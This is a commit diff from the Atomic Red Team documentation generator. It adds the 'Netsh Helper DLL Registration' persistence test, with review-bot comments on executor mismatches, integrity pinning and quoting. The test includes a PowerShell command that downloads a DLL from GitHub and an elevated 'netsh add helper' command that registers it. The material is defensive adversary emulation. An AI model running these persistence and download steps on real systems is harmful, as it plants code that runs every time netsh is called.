Generated docs from job=generate-docs branch=master [ci skip]

Atomic Red Team doc generator
2022-09-23 18:16:10 +00:00
parent 24530e138f
commit de803e9e53
2 changed files with 64 additions and 11 deletions
+40 -8
@@ -40929,22 +40929,38 @@ privilege-escalation:
atomic_tests:
- name: Netsh Helper DLL Registration
auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d
description: 'Netsh interacts with other operating system components using dynamic-link
library (DLL) files
description: |
You can register a "helper dll" with Netsh as a persistance mechanism. The code in the dll is executed every time netsh.exe is called.
The NetshHelper.dll provided with the atomic will simply launch notepad when netsh.exe is run.
'
[Blog](https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html)
[Sample DLL code](https://github.com/outflanknl/NetshHelperBeacon)
supported_platforms:
- windows
input_arguments:
helper_file:
description: Path to DLL
type: Path
default: C:\Path\file.dll
default: PathToAtomicsFolder\T1546.007\bin\NetshHelper.dll
dependencies:
- description: 'Helper DLL must exist on disk at specified location (#{helper_file})
'
prereq_command: 'if (Test-Path "#{helper_file}") { exit 0} else { exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path #{helper_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}"
executor:
command: 'netsh.exe add helper #{helper_file}
'
cleanup_command: 'netsh.exe delete helper #{helper_file}
'
name: command_prompt
elevation_required: true
T1574.004:
technique:
x_mitre_platforms:
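Review bot: the new `prereq_command` and `get_prereq_command` in this dependencies block are PowerShell (`Test-Path`, `New-Item`, `Invoke-WebRequest`), but the only executor declared for the test is `name: command_prompt` and the block sets no `dependency_executor_name`. Under cmd.exe the `if (Test-Path ...) { exit 0} else { exit 1}` check is not valid syntax, so the prerequisite check cannot succeed and the download step will not run. Add `dependency_executor_name: powershell` to the dependencies section of the source atomic for T1546.007 and regenerate, rather than editing this generated index.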
@@ -63735,22 +63751,38 @@ persistence:
atomic_tests:
- name: Netsh Helper DLL Registration
auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d
description: 'Netsh interacts with other operating system components using dynamic-link
library (DLL) files
description: |
You can register a "helper dll" with Netsh as a persistance mechanism. The code in the dll is executed every time netsh.exe is called.
The NetshHelper.dll provided with the atomic will simply launch notepad when netsh.exe is run.
'
[Blog](https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html)
[Sample DLL code](https://github.com/outflanknl/NetshHelperBeacon)
supported_platforms:
- windows
input_arguments:
helper_file:
description: Path to DLL
type: Path
default: C:\Path\file.dll
default: PathToAtomicsFolder\T1546.007\bin\NetshHelper.dll
dependencies:
- description: 'Helper DLL must exist on disk at specified location (#{helper_file})
'
prereq_command: 'if (Test-Path "#{helper_file}") { exit 0} else { exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path #{helper_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}"
executor:
command: 'netsh.exe add helper #{helper_file}
'
cleanup_command: 'netsh.exe delete helper #{helper_file}
'
name: command_prompt
elevation_required: true
T1505.001:
technique:
x_mitre_platforms:
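Review bot: `get_prereq_command` downloads `NetshHelper.dll` from a `raw/master` URL and writes it straight to `#{helper_file}` with no integrity check, and the test then registers that file with `netsh.exe add helper` under `elevation_required: true`. Because `master` is a moving reference, the binary that gets loaded can change without this test changing. Pin the URL to a commit and compare a `Get-FileHash` result against an expected value before the prereq reports success. The same applies to the identical block under `privilege-escalation` in the previous hunk.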
+24 -3
View File
@@ -12,7 +12,11 @@ Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code
<br/>
## Atomic Test #1 - Netsh Helper DLL Registration
Netsh interacts with other operating system components using dynamic-link library (DLL) files
You can register a "helper dll" with Netsh as a persistance mechanism. The code in the dll is executed every time netsh.exe is called.
The NetshHelper.dll provided with the atomic will simply launch notepad when netsh.exe is run.
[Blog](https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html)
[Sample DLL code](https://github.com/outflanknl/NetshHelperBeacon)
**Supported Platforms:** Windows
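Review bot: "persistance" in the new description should be "persistence"; the same misspelling is in the YAML description, so fix it in the source atomic and regenerate. The description's two sentences and the two links (`[Blog]`, `[Sample DLL code]`) also sit on consecutive lines with no blank line or list markup between them, so Markdown will render them as one run-on paragraph. Separate them with blank lines or turn the links into a short list.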
@@ -26,19 +30,36 @@ Netsh interacts with other operating system components using dynamic-link librar
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| helper_file | Path to DLL | Path | C:&#92;Path&#92;file.dll|
| helper_file | Path to DLL | Path | PathToAtomicsFolder&#92;T1546.007&#92;bin&#92;NetshHelper.dll|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
netsh.exe add helper #{helper_file}
```
#### Cleanup Commands:
```cmd
netsh.exe delete helper #{helper_file}
```
#### Dependencies: Run with `command_prompt`!
##### Description: Helper DLL must exist on disk at specified location (#{helper_file})
##### Check Prereq Commands:
```cmd
if (Test-Path "#{helper_file}") { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path #{helper_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}"
```
<br/>
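Review bot: `#{helper_file}` is quoted in `Test-Path "#{helper_file}"` and `-OutFile "#{helper_file}"` but left bare in `netsh.exe add helper #{helper_file}`, `netsh.exe delete helper #{helper_file}` and `(split-path #{helper_file})`. The new default begins with `PathToAtomicsFolder`, so the resolved path depends on where the atomics folder is installed, and a location containing spaces would split the argument in those three commands. Quote the argument consistently. Separately, the "Dependencies: Run with `command_prompt`!" heading and the `cmd` fences here wrap PowerShell commands, which should be corrected once the dependency executor is set in the source.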